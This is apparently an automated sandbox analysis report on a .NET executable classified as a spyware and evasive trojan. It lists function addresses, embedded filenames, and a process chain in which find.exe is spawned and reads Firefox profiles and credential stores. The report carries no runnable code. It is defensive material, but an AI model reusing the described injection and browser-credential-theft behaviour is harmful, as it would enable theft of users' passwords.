                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF2F303_2_00FF2F30
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F92F283_2_00F92F28
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100EEDB3_2_0100EEDB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FFF0CC3_2_00FFF0CC
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F570C03_2_00F570C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0101B16B3_2_0101B16B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5B1B03_2_00F5B1B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3F1723_2_00F3F172
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F8516C3_2_00F8516C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100F0E03_2_0100F0E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010070E93_2_010070E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF12ED3_2_00FF12ED
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100132D3_2_0100132D
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6B2C03_2_00F6B2C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F552A03_2_00F552A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F9739A3_2_00F9739A
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3D34C3_2_00F3D34C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010075713_2_01007571
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F414603_2_00F41460
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010195C33_2_010195C3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100F43F3_2_0100F43F
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FED5B03_2_00FED5B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100F7B03_2_0100F7B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F956303_2_00F95630
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010016CC3_2_010016CC
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F538E03_2_00F538E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBD8003_2_00FBD800
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F599503_2_00F59950
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6B9503_2_00F6B950
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE59103_2_00FE5910
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FFDAC63_2_00FFDAC6
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEDAAC3_2_00FEDAAC
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F95AA03_2_00F95AA0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF1AA33_2_00FF1AA3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100FB763_2_0100FB76
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC3A6C3_2_00FC3A6C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F8DBF93_2_00F8DBF9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC5BF03_2_00FC5BF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01007A463_2_01007A46
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100FA493_2_0100FA49
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6FB803_2_00F6FB80
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01001D5A3_2_01001D5A
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01007D733_2_01007D73
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC9C323_2_00FC9C32
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6FDC03_2_00F6FDC0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F53D403_2_00F53D40
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100FCF23_2_0100FCF2
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100FF093_2_0100FF09
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F59EB03_2_00F59EB0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100FFB13_2_0100FFB1
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F51F923_2_00F51F92
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeCode function: 4_2_02F4B8B84_2_02F4B8B8
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeCode function: 4_2_02F498984_2_02F49898
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeCode function: 4_2_02F520864_2_02F52086
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeCode function: 4_2_02F520884_2_02F52088
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeCode function: 4_2_02F499E84_2_02F499E8
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeCode function: 4_2_02F499DC4_2_02F499DC
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeCode function: 4_2_02F4B6904_2_02F4B690
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeCode function: 4_2_02F4B6984_2_02F4B698
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeCode function: 4_2_02F6A5384_2_02F6A538
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FA02C05_2_02FA02C0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FC02745_2_02FC0274
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F2E3F05_2_02F2E3F0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FE03E65_2_02FE03E6
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FDA3525_2_02FDA352
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FB20005_2_02FB2000
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FD81CC5_2_02FD81CC
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FE01AA5_2_02FE01AA
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FD41A25_2_02FD41A2
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FA81585_2_02FA8158
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FBA1185_2_02FBA118
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F101005_2_02F10100
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F3C6E05_2_02F3C6E0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F1C7C05_2_02F1C7C0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F207705_2_02F20770
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F447505_2_02F44750
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FCE4F65_2_02FCE4F6
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FD24465_2_02FD2446
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FC44205_2_02FC4420
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FE05915_2_02FE0591
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F205355_2_02F20535
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F1EA805_2_02F1EA80
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FD6BD75_2_02FD6BD7
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FDAB405_2_02FDAB40
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F4E8F05_2_02F4E8F0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F068B85_2_02F068B8
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F228405_2_02F22840
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F2A8405_2_02F2A840
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F229A05_2_02F229A0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FEA9A65_2_02FEA9A6
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F369625_2_02F36962
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FDEEDB5_2_02FDEEDB
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F32E905_2_02F32E90
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FDCE935_2_02FDCE93
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F20E595_2_02F20E59
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FDEE265_2_02FDEE26
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F2CFE05_2_02F2CFE0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F12FC85_2_02F12FC8
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F9EFA05_2_02F9EFA0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F94F405_2_02F94F40
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F40F305_2_02F40F30
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FC2F305_2_02FC2F30
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F62F285_2_02F62F28
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F10CF25_2_02F10CF2
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FC0CB55_2_02FC0CB5
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F20C005_2_02F20C00
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F1ADE05_2_02F1ADE0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F38DBF5_2_02F38DBF
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FBCD1F5_2_02FBCD1F
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F2AD005_2_02F2AD00
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FC12ED5_2_02FC12ED
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F3B2C05_2_02F3B2C0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F252A05_2_02F252A0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F6739A5_2_02F6739A
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F0D34C5_2_02F0D34C
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FD132D5_2_02FD132D
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FD70E95_2_02FD70E9
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FDF0E05_2_02FDF0E0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FCF0CC5_2_02FCF0CC
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F270C05_2_02F270C0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F2B1B05_2_02F2B1B0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F0F1725_2_02F0F172
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FEB16B5_2_02FEB16B
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F5516C5_2_02F5516C
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FD16CC5_2_02FD16CC
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F656305_2_02F65630
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FDF7B05_2_02FDF7B0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F114605_2_02F11460
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FDF43F5_2_02FDF43F
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FE95C35_2_02FE95C3
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FBD5B05_2_02FBD5B0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FD75715_2_02FD7571
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FCDAC65_2_02FCDAC6
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F65AA05_2_02F65AA0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FBDAAC5_2_02FBDAAC
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FC1AA35_2_02FC1AA3
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F93A6C5_2_02F93A6C
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FDFA495_2_02FDFA49
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FD7A465_2_02FD7A46
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F95BF05_2_02F95BF0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F5DBF95_2_02F5DBF9
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F3FB805_2_02F3FB80
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FDFB765_2_02FDFB76
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F238E05_2_02F238E0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F8D8005_2_02F8D800
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F299505_2_02F29950
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F3B9505_2_02F3B950
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FB59105_2_02FB5910
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F29EB05_2_02F29EB0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02EE3FD55_2_02EE3FD5
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02EE3FD25_2_02EE3FD2
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FDFFB15_2_02FDFFB1
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F21F925_2_02F21F92
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FDFF095_2_02FDFF09
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FDFCF25_2_02FDFCF2
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F99C325_2_02F99C32
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F3FDC05_2_02F3FDC0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FD7D735_2_02FD7D73
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02FD1D5A5_2_02FD1D5A
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F23D405_2_02F23D40
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006D1EE05_2_006D1EE0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006CCDA85_2_006CCDA8
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006CCDB05_2_006CCDB0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006CCFD05_2_006CCFD0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006CAFA65_2_006CAFA6
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006CAFB05_2_006CAFB0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006CB0F45_2_006CB0F4
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006CB1005_2_006CB100
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006D55B05_2_006D55B0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006D37A05_2_006D37A0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006D379E5_2_006D379E
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006EBC505_2_006EBC50
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_00DC020D5_2_00DC020D
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_00DCE3085_2_00DCE308
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_00DCE4235_2_00DCE423
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_00DCE7C85_2_00DCE7C8
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_00DCD8885_2_00DCD888
                      Source: C:\Windows\SysWOW64\find.exeCode function: String function: 02F55130 appears 58 times
                      Source: C:\Windows\SysWOW64\find.exeCode function: String function: 02F0B970 appears 280 times
                      Source: C:\Windows\SysWOW64\find.exeCode function: String function: 02F8EA12 appears 86 times
                      Source: C:\Windows\SysWOW64\find.exeCode function: String function: 02F67E54 appears 111 times
                      Source: C:\Windows\SysWOW64\find.exeCode function: String function: 02F9F290 appears 105 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00F97E54 appears 111 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FCF290 appears 105 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00F85130 appears 58 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00F3B970 appears 280 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FBEA12 appears 86 times
                      Source: file.exeBinary or memory string: OriginalFilename vs file.exe
                      Source: file.exe, 00000000.00000002.1420015259.0000000007200000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs file.exe
                      Source: file.exe, 00000000.00000002.1420720105.0000000007510000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs file.exe
                      Source: file.exe, 00000000.00000002.1417267830.0000000003E39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs file.exe
                      Source: file.exe, 00000000.00000002.1417267830.0000000003E39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs file.exe
                      Source: file.exe, 00000000.00000002.1415159712.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                      Source: file.exe, 00000000.00000000.1392565502.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVqTu.exe" vs file.exe
                      Source: file.exe, 00000003.00000002.1567304245.0000000000C58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFIND.EXEj% vs file.exe
                      Source: file.exe, 00000003.00000002.1567304245.0000000000C68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFIND.EXEj% vs file.exe
                      Source: file.exe, 00000003.00000002.1567650685.000000000103D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs file.exe
                      Source: file.exeBinary or memory string: OriginalFilenameVqTu.exe" vs file.exe
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, GV3ENqm9nOtfltcevd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, vcGrCi4KDgYFK31I25.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, vcGrCi4KDgYFK31I25.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.file.exe.3f1eb10.3.raw.unpack, vcGrCi4KDgYFK31I25.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: 0.2.file.exe.7510000.5.raw.unpack, vcGrCi4KDgYFK31I25.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.file.exe.7510000.5.raw.unpack, vcGrCi4KDgYFK31I25.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.file.exe.7510000.5.raw.unpack, vcGrCi4KDgYFK31I25.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: 0.2.file.exe.7510000.5.raw.unpack, GV3ENqm9nOtfltcevd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@17/11
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\find.exeFile created: C:\Users\user\AppData\Local\Temp\e151968Jump to behavior
                      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: find.exe, 00000005.00000002.3858129273.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000002.3858129273.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000003.1769436271.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000003.1769517656.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000003.1771465886.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000003.1771465886.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000002.3858129273.0000000000ABE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: file.exeReversingLabs: Detection: 34%
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"
                      Source: C:\Windows\SysWOW64\find.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeSection loaded: mswsock.dllJump to behavior
